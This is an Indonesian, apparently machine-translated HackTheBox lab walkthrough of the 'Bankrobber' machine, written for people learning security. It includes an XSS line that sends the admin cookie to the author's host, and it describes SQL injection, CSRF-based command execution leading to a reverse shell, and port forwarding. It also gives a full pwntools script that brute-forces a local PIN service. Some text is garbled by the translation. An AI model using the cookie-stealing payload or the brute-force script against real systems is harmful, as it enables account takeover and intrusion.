Retas Kotak. Panduan Bankrobber. XSS, injeksi SQL, CSRF, penerusan porta

gambar

Saya terus menerbitkan solusi yang dikirim untuk diproses lebih lanjut dari situs HackTheBox . Saya berharap ini akan membantu setidaknya seseorang untuk berkembang di bidang keamanan informasi. Dalam artikel ini, kami akan mencuri cookie administrator situs melalui XSS, mengetahui kode menggunakan injeksi SQL, mendapatkan shell melalui formulir eksekusi perintah menggunakan XSS dan CSRF, menyodok port dari Windows, dan memutar PIN aplikasi transfer uang mudah menggunakan pwntools.

Koneksi ke laboratorium adalah melalui VPN. Dianjurkan untuk tidak terhubung dari komputer kantor atau dari host di mana data yang penting bagi Anda tersedia, karena Anda berakhir di jaringan pribadi dengan orang-orang yang mengetahui sesuatu di bidang keamanan informasi :)

Informasi Organisasi
Terutama bagi mereka yang ingin mempelajari sesuatu yang baru dan berkembang di bidang informasi dan keamanan komputer, saya akan menulis dan berbicara tentang kategori berikut:

  • PWN;
  • kriptografi (Crypto);
  • teknologi jaringan (Jaringan);
  • membalikkan (Reverse Engineering);
  • steganografi (Stegano);
  • WEB-.

, , , .

, , Telegram . , , .

. , - , .

Recon


Mesin ini memiliki alamat IP 10.10.10.154, yang saya tambahkan ke / etc / hosts.

10.10.10.154	bankrobber.htb

Pertama, kami memindai port terbuka. Karena butuh waktu lama untuk memindai semua port dengan nmap, saya akan melakukan ini dengan masscan. Kami memindai semua port TCP dan UDP dari antarmuka tun0 dengan kecepatan 500 paket per detik.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.154 --rate=500

gambar

Sekarang, untuk informasi lebih rinci tentang layanan yang beroperasi pada port, kami akan menjalankan pemindaian dengan opsi -A.

nmap -A bankrobber.htb -p80,443,445,3306

gambar

Tuan rumah memiliki server web dan SMB, dan MySQL juga tersedia. SMB dan MySQL tidak memberi kita apa-apa, jadi lihatlah web.

gambar

Situs web Bitcoin disajikan di tempat kami dapat mendaftar.

gambar

Mari mendaftar dan masuk. Kami disediakan formulir untuk mentransfer dana.

gambar

Setelah menyelesaikan permintaan tes sederhana, kami mendapat pesan. Dikatakan bahwa Administrator akan mempertimbangkan permintaan transaksi kami dan membuat keputusan.

gambar

Ini adalah petunjuk yang sangat besar tentang XSS. Mari kita coba mencuri cookie admin. Pertama, gunakan server HTTP lokal.

gambar

Sekarang kami menjalankan permintaan transaksi, menentukan JS load berikut sebagai pesan.
<script>new  Image().src="http://10.10.15.106/xss?param="%2bdocument.cookie;</script>

Dengan demikian, mencoba mengunggah gambar, skrip akan menghubungi alamat ini dan, sebagai parameter, akan mengirimkan kepada kami cookie dari akun tempat skrip dieksekusi (dalam hal ini, administrator).

gambar

Sepertinya base64. Kami memecahkan kode dan mendapatkan login dan kata sandi administrator.

gambar

Masuk sebagai admin dan lihat apa yang baru bagi kami. Dengan mengirimkan penawaran di bidang pencarian pengguna, kami mendapatkan kesalahan - ada suntikan.

gambar

Server lain meminta perintah dir.

gambar

Tetapi hanya jawaban localhost.

gambar

Mari kita kembali ke injeksi SQL.

gambar

Kami menentukan jumlah kolom dan kolom mana yang ditampilkan.

gambar

Dengan demikian, kolom pertama dan kedua ditampilkan.

PENGGUNA


Setelah duduk sedikit, kami menemukan tidak ada yang menarik. Mari kita beralih ke modul backdoorchecker. Temukan acara yang merespons klik tombol.

gambar

Buka konsol browser dan masukkan nama fungsi.

gambar

Kami mengikuti tautan ke fungsi.

gambar

Dan kami menemukan ke mana permintaan itu pergi. Berkat injeksi, kita dapat membaca file (pertama kali saya menebak jalur xampp default).

gambar

Dengan demikian, perintah akan dieksekusi jika "dir" substring ada di baris. Ini memungkinkan kami untuk mengirim serangkaian perintah. Masih berurusan dengan satu, permintaan harus datang dari localhost. Kami mengingat fungsi XSS dan callSys (), yang dapat kami panggil untuk mengirim permintaan. Periksa asumsi kami.

gambar

Karena perintah sudah selesai, mari kita jalankan RCE menggunakan skrip Invoke-PowerShellTcp dari paketnishang .

gambar

AKAR


Pertama-tama, kami melakukan pencacahan dasar sistem. Untuk ini kami menggunakan winPEAS .

gambar

Dari semua output, kita berpegang teguh pada port terbuka di localhost 910.

gambar

Mari kita lihat apa yang ada di dalamnya. Pertama, Anda perlu membuang porta. Di antara semua program, solusi paling mudah adalah pahat . Jalankan di localhost dan host jarak jauh.

gambar

gambar

Sekarang terhubung dan lihat apa yang ada di sana.

gambar

Diperlukan kode PIN 4 digit. Kami akan mengatasinya.
#!/usr/bin/python3

def clear():
    sys.stdout.write("\033[F")
    sys.stdout.write("\033[K")

from pwn import *

for numb in range(10000):
    PIN = str(numb).rjust(4, '0')
    r = remote('127.0.0.1', 910)
    print("Find PIN: " + PIN, end="\r")
    clear()
    r.sendafter('[$] ', PIN+"\n")
    ans = r.recv()
    if b"Access denied" in ans:
        r.close()
        clear()
    else:
        print("[+] PIN found: " + PIN)
        print(str(ans, "utf-8"))
        break
    
r.interactive()


gambar

Kami menemukan kode PIN dan kami diminta untuk memasukkan jumlah transaksi. Kami melakukan ini dan tidak ada yang terjadi.

gambar

Jumlahnya ditransfer ke program yang berjalan sebagai administrator. Tidak menemukan apa-apa lagi, kami mentransfer sebagai jumlah 100 karakter.

gambar

gambar

Dan kami melihat bagaimana jalur peluncuran program telah berubah menjadi bagian dari jalur kami. Mari kita periksa dari indeks mana ini terjadi.

gambar

Jadi, jika kita melewati garis dengan nama program lain, itu akan dieksekusi. Mari kita periksa.

gambar

gambar

gambar

Dan anggapan itu benar. Untuk memulai, unduh netcat.

gambar

Dan sekarang mari kita lakukan back connect.

gambar

gambar

Memperoleh hak istimewa SISTEM.

Anda dapat bergabung dengan kami di Telegram. Mari kita kumpulkan sebuah komunitas di mana akan ada orang-orang yang berpengalaman dalam banyak bidang TI, maka kita selalu dapat saling membantu dalam masalah TI dan keamanan informasi.

All Articles